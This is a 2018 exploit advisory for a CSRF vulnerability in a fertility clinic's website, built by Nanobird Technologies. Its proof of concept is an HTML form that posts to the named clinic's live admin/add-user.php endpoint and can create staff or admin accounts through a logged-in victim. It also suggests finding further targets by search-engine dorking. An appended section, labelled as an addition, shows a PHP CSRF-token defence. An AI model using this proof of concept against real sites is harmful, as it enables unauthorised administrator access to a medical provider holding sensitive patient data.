Advanced Fertility & Genetics Centre LLC. by Nanobird Technologies CSRF Vulnerability

2018.07.06
indoushka (DZ)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

====================================================================================================
| # Title     : Advanced Fertility & Genetics Centre LLC. by Nanobird Technologies CSRF Vulnerability
| # Author    : indoushka
| # Tested on : windows 10 Français V.(Pro)
| # Vendor    : https://nanobirdtech.com/
| # Dork      :
====================================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] save in poc.html

<h1>Add User</h1>
<ol class="breadcrumb">
  <li class="active">Add User</li>
</ol>
</section>

<!-- Main content -->
<section class="content">
  <div class="row">
    <div class="col-md-6">
      <div class="box box-primary">
        <div class="box-header">
          <h3 class="box-title">Enter User Informations</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          <form role="form" action="http://www.omanadvancedfertility.com/admin/add-user.php" method="post" enctype="multipart/form-data">
            <!-- text input -->
            <div class="form-group">
              <label>Username</label>
              <input class="form-control" value="" name="username" maxlength="20" required="" type="text">
            </div>
            <div class="form-group">
              <label for="exampleInputPassword1">Password</label>
              <input class="form-control" name="password" id="exampleInputPassword1" value="" required="" maxlength="20" type="password">
            </div>
            <div class="form-group">
              <label>User Type</label>
              <select class="form-control" name="user_type">
                <option value="staff">Staff</option>
                <option value="admin">Admin</option>
              </select>
            </div>
            <div class="box-footer">
              <button type="submit" class="btn btn-primary" name="Create"><span class="fa fa-save"></span>&nbsp;Save</button>
            </div>
          </form>
        </div>
      </div>
    </div><!-- /.col -->
  </div>
</section><!-- /.content -->
</aside>

Greetings to :
====================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh
====================================================================================================
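
A server-side mitigation for a form like the one above, as an added example that is not the vendor's code or part of the original advisory: a per-session token is embedded in the form and compared with hash_equals() before the handler acts. The `is_admin` session key, the function names and delivery over HTTPS are assumptions.

```php
<?php
// Added example: hypothetical hardened handler for a form like admin/add-user.php.
// Session layout and function names are assumptions, not the vendor's code.
declare(strict_types=1);

// SameSite=Strict keeps the session cookie off cross-site POSTs (assumes HTTPS, PHP >= 7.3).
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Strict']);
session_start();

/** Return the per-session anti-CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Constant-time check of the token submitted with a state-changing request. */
function csrf_check($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    // is_string() rejects array input such as csrf_token[]=x before comparing.
    return is_string($submitted) && $expected !== '' && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Reject before touching the user table: a form hosted on another origin
    // cannot read the session token, so it cannot supply a matching value.
    if (empty($_SESSION['is_admin']) || !csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Forbidden');
    }
    // ... validate username, password and user_type, then create the account ...
    exit('User created');
}
?>
<form role="form" action="add-user.php" method="post">
    <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
    <input name="username" maxlength="20" required type="text">
    <input name="password" maxlength="20" required type="password">
    <select name="user_type">
        <option value="staff">Staff</option>
        <option value="admin">Admin</option>
    </select>
    <button type="submit" name="Create">Save</button>
</form>
```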



Copyright 2018, cxsecurity.com

 
